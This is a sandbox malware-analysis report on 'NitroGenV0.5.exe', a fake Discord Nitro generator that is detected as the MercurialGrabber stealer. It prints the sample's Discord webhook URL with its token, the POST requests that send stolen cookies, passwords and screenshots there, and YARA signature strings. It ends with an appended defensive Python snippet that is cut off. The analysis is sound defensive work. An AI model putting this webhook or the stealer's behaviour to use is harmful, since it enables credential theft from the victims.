
Windows Analysis Report https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe

Overview

General Information

Sample URL:https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe
Analysis ID:517177

Detection

MercurialGrabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected MercurialGrabber
Antivirus detection for dropped file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
PE file contains strange resources
Drops PE files
Contains capabilities to detect virtual machines
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6988 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wget.exe (PID: 7096 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • NitroGenV0.5.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\download\NitroGenV0.5.exe" MD5: B4A34AC1A572E23168B2C6803780FE7E)
    • conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • NitroGenV0.5.exe (PID: 7100 cmdline: "C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe" MD5: B4A34AC1A572E23168B2C6803780FE7E)
    • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: MercurialGrabber

{"Webhook Url": "https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY"}

Yara Overview

Dropped Files

Source | Rule | Description | Author
C:\Users\user\Desktop\download\NitroGenV0.5.exe | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security
C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security
C:\Users\user\Desktop\download\NitroGenV0.5.exe | MAL_Luna_Stealer_Apr_2021_1 | Detect Luna stealer (also Mercurial Grabber) | Arkbird_SOLG
  Strings:
  • 0xb20:$s1: 73 40 00 00 0A 0B 07 72 B2 0C 00 70 02 7B 07 00 00 04 28 13 00 00 0A 6F 41 00 00 0A 0C 08 6F 42 00 00 0A 6F 43 00 00 0A 6F 44 00 00 0A 0D 09 6F 45 00 00 0A 0A 02 72 E4 0C 00 70 06 28 2F 00 00 ...
  • 0x1d4c:$s2: 72 FD 18 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0A 02 72 0F 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 7D 38 00 00 04 72 15 19 00 70 02 7B 36 00 00 04 28 2F 00 00 06 0B 02 06 72 31 19 00 70 07 ...
  • 0x7c4c:$x1: ---------------- mercurial grabber ----------------
  • 0x7e94:$x2: 5C 00 73 00 2A 00 3A 00 5C 00 73 00 2A 00 28 00 22 00 28 00 3F 00 3A 00 5C 00 5C 00 22 00 7C 00 5B 00 5E 00 22 00 5D 00 29 00 2A 00 3F
  • 0x80ae:$x3: 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 34 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 36 00 7D 00 5C 00 2E 00 5B 00 5C 00 77 00 2D 00 5D 00 7B 00 32 00 37 00 7D 00 01 1D 6D 00 ...
C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | MAL_Luna_Stealer_Apr_2021_1 | Detect Luna stealer (also Mercurial Grabber) | Arkbird_SOLG
  Strings: the same five matches (at 0xb20, 0x1d4c, 0x7c4c, 0x7e94, 0x80ae) as for the Desktop copy above

Memory Dumps

Source | Rule | Description | Author
00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security
00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security
00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security
00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security
Process Memory Space: NitroGenV0.5.exe PID: 6784 | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security

Unpacked PEs

Source | Rule | Description | Author
6.2.NitroGenV0.5.exe.8e0000.0.unpack | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security
17.0.NitroGenV0.5.exe.510000.0.unpack | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security
6.0.NitroGenV0.5.exe.8e0000.0.unpack | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security
6.2.NitroGenV0.5.exe.8e0000.0.unpack | MAL_Luna_Stealer_Apr_2021_1 | Detect Luna stealer (also Mercurial Grabber) | Arkbird_SOLG
  Strings: the same five matches (at 0xb20, 0x1d4c, 0x7c4c, 0x7e94, 0x80ae) listed under Dropped Files
17.2.NitroGenV0.5.exe.510000.0.unpack | JoeSecurity_MercurialGrabber | Yara detected MercurialGrabber | Joe Security

Sigma Overview

System Summary:

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started
Author: James Pemberton / @4A616D6573
Data:
  Command: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
  CommandLine: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
  CommandLine|base64offset|contains:
  Image: C:\Windows\SysWOW64\wget.exe
  NewProcessName: C:\Windows\SysWOW64\wget.exe
  OriginalFileName: C:\Windows\SysWOW64\wget.exe
  ParentCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1
  ParentImage: C:\Windows\SysWOW64\cmd.exe
  ParentProcessId: 6988
  ProcessCommandLine: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
  ProcessId: 7096

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack | Malware Configuration Extractor: MercurialGrabber {"Webhook Url": "https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY"}
Yara detected MercurialGrabber
Source: Yara match | File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Avira: detection malicious, Label: HEUR/AGEN.1143801
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Avira: detection malicious, Label: HEUR/AGEN.1143801
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Code function: 6_2_00007FFC08BBB20E CryptUnprotectData, 6_2_00007FFC08BBB20E
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Code function: 6_2_00007FFC08BBB241 CryptUnprotectData, 6_2_00007FFC08BBB241
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Code function: 6_2_00007FFC08BBB25E CryptUnprotectData, 6_2_00007FFC08BBB25E
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Code function: 17_2_00007FFC0893AD7A CryptUnprotectData, 17_2_00007FFC0893AD7A
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Code function: 17_2_00007FFC0893B25E CryptUnprotectData, 17_2_00007FFC0893B25E

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Unpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Unpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack
Source: unknown | HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49742 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.3:49744 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49755 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49757 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49741 version: TLS 1.2

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: ip4.seeip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 448 Expect: 100-continue Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 315 Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 704 Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 307 Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 307 Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 315 Expect: 100-continue
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: ip4.seeip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 448 Expect: 100-continue Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 315 Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 704 Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 307 Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 307 Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1 Content-Type: application/json Host: discord.com Content-Length: 315 Expect: 100-continue
Source: global traffic | HTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp | String found in binary or memory: (Chrome plugin metadata JSON blob, omitted)
Source: wget.exe, 00000004.00000003.276308627.0000000002B65000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmp, NitroGenV0.5.exe, 00000006.00000002.304401796.000000001BBE5000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.351164827.000000001C910000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmp | String found in binary or memory: http://discord.com
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp | String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp | String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350437000.00000000027D9000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr | String found in binary or memory: http://ip-api.com//json/
Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.com//json/84.17.52.68
Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350381748.00000000027AD000.00000004.00000001.sdmp | String found in binary or memory: http://ip-api.comx
Source: NitroGenV0.5.exe, 00000006.00000002.302789893.0000000002D1D000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350381748.00000000027AD000.00000004.00000001.sdmp | String found in binary or memory: http://ip4.seeip.org
Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wget.exe, wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/Ni
Source: wget.exe, 00000004.00000002.276636961.0000000001075000.00000004.00000040.sdmp, cmdline.out.1.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe
Source: wget.exe, 00000004.00000003.276308627.0000000002B65000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe$
Source: wget.exe, 00000004.00000002.276632718.0000000001070000.00000004.00000040.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe0
Source: wget.exe, 00000004.00000002.276636961.0000000001075000.00000004.00000040.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe9
Source: wget.exe, 00000004.00000002.276632718.0000000001070000.00000004.00000040.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe;
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.302988572.0000000002DC5000.00000004.00000001.sdmp, ConDrv.6.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810248877211688/cookies.txt
Source: NitroGenV0.5.exe, 00000006.00000002.303106911.0000000002E67000.00000004.00000001.sdmp, ConDrv.6.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810251381211176/passwords.txt
Source: NitroGenV0.5.exe, 00000006.00000002.303147034.0000000002EA2000.00000004.00000001.sdmp, ConDrv.6.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810260252164166/Capture.jpg
Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, ConDrv.17.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810339021168680/cookies.txt
Source: NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, ConDrv.17.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810341642612736/passwords.txt
Source: NitroGenV0.5.exe, 00000011.00000002.350726464.0000000002932000.00000004.00000001.sdmp, ConDrv.17.dr | String found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810352568766474/Capture.jpg
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr | String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmp | String found in binary or memory: https://discord.com
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp, NitroGenV0.5.exe.6.dr | String found in binary or memory: https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw
Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: https://discord.com8
Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmp | String found in binary or memory: https://discord.comx
Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr | String found in binary or memory: https://discordapp.com/api/v8/users/
                        Source: NitroGenV0.5.exe.6.drString found in binary or memory: https://i.imgur.com/vgxBhmx.png
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://i.imgur.com/vgxBhmx.pngultipart/form-data
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://ip4.seeip.org
                        Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpString found in binary or memory: https://ip4.seeip.org/
                        Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpString found in binary or memory: https://ip4.seeip.orgx
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.302988572.0000000002DC5000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810248877211688/cookies.txt
                        Source: NitroGenV0.5.exe, 00000006.00000002.303106911.0000000002E67000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810251381211176/passwords.txt
                        Source: NitroGenV0.5.exe, 00000006.00000002.303147034.0000000002EA2000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810260252164166/Capture.jpg
                        Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810339021168680/cookies.txt
                        Source: NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810341642612736/passwords.txt
                        Source: NitroGenV0.5.exe, 00000011.00000002.350726464.0000000002932000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810352568766474/Capture.jpg
                        Source: NitroGenV0.5.exe, 00000006.00000002.302816261.0000000002D42000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350548671.000000000285E000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://www.countryflags.io/
                        Source: NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmpString found in binary or memory: https://www.countryflags.io/CH/flat/48.png
                        Source: unknownHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: cdn.discordapp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49741 version: TLS 1.2
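The request records above are the network side of the infection chain a defender can key on: two GETs to ip4.seeip.org and ip-api.com that look up the victim's public IP, then a POST to a Discord webhook (discord.com/api/webhooks/<id>/<token>) that delivers the collected data, and the stealer's requests carry no User-Agent header at all (the report lists "HTTP GET or POST without a user agent" as a signature). Note that the Joe Sandbox Cloud Basic URL lookup recorded in the System Summary below returned "clean", so behavioural signals like these, not URL reputation, are what catch this sample. The Python below is an added example, not part of the Joe Sandbox report or of the Mercurial Grabber code, that classifies request records written in the same one-line form as the report (request line and headers separated by " | "). The sample records are constructed from the requests listed above; the rule names and severities are the example's own choices, and the host lists are deliberately short.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample records, transcribed from the requests the report lists above.
# One request per string: request line, then headers, separated by " | ".
SAMPLE_REQUESTS = [
    "GET /attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe HTTP/1.1 | "
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | "
    "Accept: */* | Accept-Encoding: identity | Host: cdn.discordapp.com | Connection: Keep-Alive",
    "GET / HTTP/1.1 | Host: ip4.seeip.org | Connection: Keep-Alive",
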